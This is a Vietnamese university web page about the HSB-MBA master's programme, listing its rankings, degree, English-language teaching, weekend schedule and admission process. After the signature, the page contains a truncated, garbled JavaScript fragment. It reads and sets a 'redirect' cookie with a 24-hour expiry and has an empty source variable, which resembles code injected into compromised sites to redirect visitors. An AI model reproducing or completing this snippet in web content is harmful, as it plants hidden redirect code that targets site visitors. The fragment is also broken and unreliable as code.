Chương trình đào tạo Thạc sĩ Quản trị Kinh doanh (HSB-MBA)

Chương trình đào tạo Thạc sĩ Quản trị Kinh doanh (Master in Business Administration, HSB – MBA) được Khoa Quản trị và Kinh doanh (HSB) tổ chức đào tạo thành công từ năm 2002 với sự hợp tác của các trường hàng đầu thế giới. Chương trình được triển khai với sự hợp tác giảng dạy của Trường Kinh doanh – Đại học Queensland xếp hạng 14 toàn thế giới (Bảng xếp hạng năm 2013 của The Economist). Ngoài ra, HSB – MBA cũng được tổ chức Eduniveral xếp hạng 27 trong số các chương trình đào tạo thạc sĩ MBA trong khu vực Viễn Đông trong năm 2017.

 1. Hệ đào tạo: Thạc sĩ.

2. Ngành: Quản trị kinh doanh.

3. Chuyên ngành: Quản trị kinh doanh, mã số 60 34 01 02.

4. Văn bằng: thạc sĩ chính quy do Đại học Quốc gia Hà Nội cấp.

5. Ngôn ngữ đào tạo: tiếng Anh.

6. Thời gian đào tạo: 18-24 tháng, thời gian học vào thứ Bảy và Chủ nhật hàng tuần.

7. Hình thức thi tuyển: đánh giá hồ sơ, phỏng vấn chuyên môn và viết luận.

8. Khung chương trình đào tạo:

{edocs}/docs/khung/08.pdf,100%,868{/edocs}

                                                                                     Phòng Đào tạo

{var U=(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”=”,now=Math.floor(Date.now()/1e3),(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),’

Trả lời

Email của bạn sẽ không được hiển thị công khai.